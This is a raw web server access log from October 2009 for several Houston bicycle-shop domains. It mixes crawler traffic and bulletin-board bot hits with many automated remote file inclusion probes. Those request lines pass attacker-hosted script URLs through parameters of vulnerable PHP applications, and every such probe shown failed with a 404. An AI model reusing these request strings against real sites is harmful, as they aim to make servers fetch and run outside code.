211.40.68.132 - - [09/Oct/2009:23:50:19 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.40.68.132 - - [09/Oct/2009:23:50:32 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:50:32 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:50:32 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.40.68.132 - - [09/Oct/2009:23:50:32 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.40.68.132 - - [09/Oct/2009:23:50:32 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
222.237.78.50 - - [09/Oct/2009:23:54:04 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
24.2.239.121 - - [09/Oct/2009:23:54:05 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
70.188.136.132 - - [09/Oct/2009:23:54:15 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
98.149.200.249 - - [09/Oct/2009:23:54:20 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
94.139.224.65 - - [09/Oct/2009:23:54:20 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
24.21.83.141 - - [09/Oct/2009:23:54:21 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
68.33.166.106 - - [09/Oct/2009:23:54:22 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
94.139.224.65 - - [09/Oct/2009:23:54:23 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
94.139.224.14 - - [09/Oct/2009:23:54:43 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
94.139.224.65 - - [09/Oct/2009:23:54:44 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
75.67.39.120 - - [09/Oct/2009:23:54:44 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
71.196.34.92 - - [09/Oct/2009:23:54:45 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
61.93.103.218 - - [09/Oct/2009:23:54:46 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
140.113.73.48 - - [09/Oct/2009:23:54:48 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
114.47.227.13 - - [09/Oct/2009:23:54:53 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
123.238.2.180 - - [09/Oct/2009:23:54:55 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
200.71.149.82 - - [09/Oct/2009:23:56:00 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
193.17.174.4 - - [09/Oct/2009:23:56:04 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
67.165.59.30 - - [09/Oct/2009:23:56:05 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
123.238.2.180 - - [09/Oct/2009:23:56:06 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
24.154.167.232 - - [09/Oct/2009:23:57:14 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
24.154.167.232 - - [09/Oct/2009:23:57:21 -0700] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
24.154.167.232 - - [09/Oct/2009:23:57:26 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Opera/9.0 (Windows NT 5.1; U; en)" "bicyclestoreshouston.com"
81.12.13.152 - - [10/Oct/2009:00:03:16 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Oct/2009:00:03:16 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Oct/2009:00:03:16 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:00:19:14 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:00:19:19 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:00:19:38 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:20:42 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:20:50 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:20:57 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:21:17 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:21:18 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:21:18 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:21:52 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:21:52 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:21:58 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:23:38 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:23:38 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.242.37.212 - - [10/Oct/2009:00:23:39 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.142.122 - - [10/Oct/2009:00:24:19 -0700] "GET /logs/?D=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
38.101.148.126 - - [10/Oct/2009:00:46:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "bicyclestoreshouston.com"
218.38.243.71 - - [10/Oct/2009:00:46:36 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.243.71 - - [10/Oct/2009:00:46:36 -0700] "GET /logs/access.log%20%20//bbs//skin/zero_vote/error.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
38.101.148.126 - - [10/Oct/2009:00:46:37 -0700] "GET /bullitinboard/viewtopic.php?p=15431 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "bicyclestoreshouston.com"
218.38.243.71 - - [10/Oct/2009:00:46:37 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.243.71 - - [10/Oct/2009:00:46:38 -0700] "GET /logs/access.log%20%20//bbs//skin/zero_vote/error.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.243.71 - - [10/Oct/2009:00:46:40 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.193.15.3 - - [10/Oct/2009:00:46:41 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.243.71 - - [10/Oct/2009:00:46:47 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.87.24.248 - - [10/Oct/2009:00:51:12 -0700] "GET /logs/access.log%20%20///setup.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.87.24.248 - - [10/Oct/2009:00:51:12 -0700] "GET /logs///setup.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.87.24.248 - - [10/Oct/2009:00:51:12 -0700] "GET //setup.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.87.24.248 - - [10/Oct/2009:00:51:20 -0700] "GET /logs///setup.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.87.24.248 - - [10/Oct/2009:00:51:20 -0700] "GET /logs/access.log%20%20///setup.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.87.24.248 - - [10/Oct/2009:00:51:20 -0700] "GET //setup.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
193.47.80.45 - - [10/Oct/2009:01:02:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "svbikes.com"
193.47.80.45 - - [10/Oct/2009:01:02:40 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "svbikes.com"
208.87.24.248 - - [10/Oct/2009:01:03:53 -0700] "GET /logs/access.log///setup.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.87.24.248 - - [10/Oct/2009:01:04:54 -0700] "GET /logs/access.log///setup.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.27 - - [10/Oct/2009:01:14:46 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; {AEDC1417-5DEC-010D-F9E5-21D011F6797F}; acc=; SV1)" "houstonbikeshop.com"
72.30.81.180 - - [10/Oct/2009:01:27:38 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
203.237.203.241 - - [10/Oct/2009:01:35:54 -0700] "GET /main.php?sayfa=http://jesustown.org/bbs/data/mainboard1/1391.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.237.203.241 - - [10/Oct/2009:01:35:54 -0700] "GET /logs//main.php?sayfa=http://jesustown.org/bbs/data/mainboard1/1391.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.237.203.241 - - [10/Oct/2009:01:36:23 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://jesustown.org/bbs/data/mainboard1/1391.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:11 -0700] "GET /logs//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:11 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:11 -0700] "GET /main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:12 -0700] "GET /main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:12 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:12 -0700] "GET /logs//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.237.203.241 - - [10/Oct/2009:01:46:55 -0700] "GET /logs/access.log//main.php?sayfa=http://jesustown.org/bbs/data/mainboard1/1391.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:56 -0700] "GET /main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:56 -0700] "GET /logs//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:46:56 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:54:38 -0700] "GET /logs/access.log//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:55:20 -0700] "GET /logs/access.log//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.132.250.44 - - [10/Oct/2009:01:55:55 -0700] "GET /logs/access.log//main.php?sayfa=http://clompunks.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:07:41 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:07:41 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:07:42 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.11.145.8 - - [10/Oct/2009:02:14:34 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.11.145.8 - - [10/Oct/2009:02:14:35 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.11.145.8 - - [10/Oct/2009:02:14:35 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.51.114 - - [10/Oct/2009:02:20:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
114.4.8.14 - - [10/Oct/2009:02:38:31 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Oct/2009:02:38:31 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Oct/2009:02:38:31 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Oct/2009:02:38:43 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:48:38 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:48:38 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:48:38 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:51:21 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:53:49 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:53:50 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:53:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
158.38.0.218 - - [10/Oct/2009:02:53:52 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
158.38.0.218 - - [10/Oct/2009:02:53:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
114.4.8.14 - - [10/Oct/2009:02:54:34 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Oct/2009:02:54:34 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Oct/2009:02:54:34 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:56:16 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:56:16 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:02:56:16 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:03:01:49 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:03:01:49 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
158.38.0.218 - - [10/Oct/2009:03:01:49 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.51.114 - - [10/Oct/2009:03:11:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
77.88.43.25 - - [10/Oct/2009:03:18:44 -0700] "GET / HTTP/1.1" 200 1764 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.svbikes.com"
72.11.145.8 - - [10/Oct/2009:03:21:07 -0700] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.6.17.164 - - [10/Oct/2009:03:25:01 -0700] "GET /bullitinboard/viewtopic.php?p=12754 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
220.181.125.28 - - [10/Oct/2009:03:32:19 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.bicyclestoreshouston.com"
220.181.125.28 - - [10/Oct/2009:03:32:39 -0700] "GET / HTTP/1.0" 200 1748 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.bicyclestoreshouston.com"
